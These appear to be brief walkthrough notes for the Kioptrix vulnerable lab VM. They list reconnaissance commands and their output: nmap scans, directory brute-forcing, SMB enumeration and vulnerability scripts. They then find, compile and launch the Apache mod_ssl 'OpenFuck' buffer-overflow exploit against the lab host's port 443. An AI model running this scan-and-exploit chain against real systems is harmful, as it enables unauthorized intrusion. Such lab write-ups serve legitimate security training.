Kioptrix 1.1

netdiscover
  La encontramos en 192.168.111.129

nmap -sV -O -Pn 192.168.111.129
  PORT      STATE SERVICE     VERSION
  22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
  80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
  111/tcp   open  rpcbind     2 (RPC #100000)
  139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
  443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
  32768/tcp open  status      1 (RPC #100024)
  
rpcinfo -p 192.168.111.129
  program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  32768  status
    100024    1   tcp  32768  status
    
gobuster -w /usr/share/wordlists/dirb/big.txt -u 192.168.111.129 -t 50 dir
  /.htpasswd (Status: 403)
  /.htaccess (Status: 403)
  /cgi-bin/ (Status: 403)
  /manual (Status: 301)
  /mrtg (Status: 301)
  /usage (Status: 301)
  /~root (Status: 403)
  /~operator (Status: 403)

enum4linux -a 192.168.111.129
  [+] Got domain/workgroup name: MYGROUP
  KIOPTRIX        <00> -         B <ACTIVE>  Workstation Service
  KIOPTRIX        <03> -         B <ACTIVE>  Messenger Service
  KIOPTRIX        <20> -         B <ACTIVE>  File Server Service
  ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
  MYGROUP         <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
  MYGROUP         <1d> -         B <ACTIVE>  Master Browser
  MYGROUP         <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

nmap --script smb-vuln* -p 139 192.168.111.129
  Host script results:
  | smb-vuln-cve2009-3103: 
  |   VULNERABLE:
  |   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
  |     State: VULNERABLE
  |     IDs:  CVE:CVE-2009-3103
  |           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
  |           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
  |           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
  |           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
  |           aka "SMBv2 Negotiation Vulnerability."
  |           
  |     Disclosure date: 2009-09-08
  |     References:
  |       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
  |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
  |_smb-vuln-ms10-054: false
  |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]

searchsploit openfuck
  Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                                                                                                              | exploits/unix/remote/21671.c
  Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                                                                                                        | exploits/unix/remote/764.c
  Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                                                                                                        | exploits/unix/remote/47080.c

apt-get install libssl-dev
gcc -o OpenFuck 47080.c -lcrypto
./OpenFuck 0x6b 192.168.111.129 443 -c 40
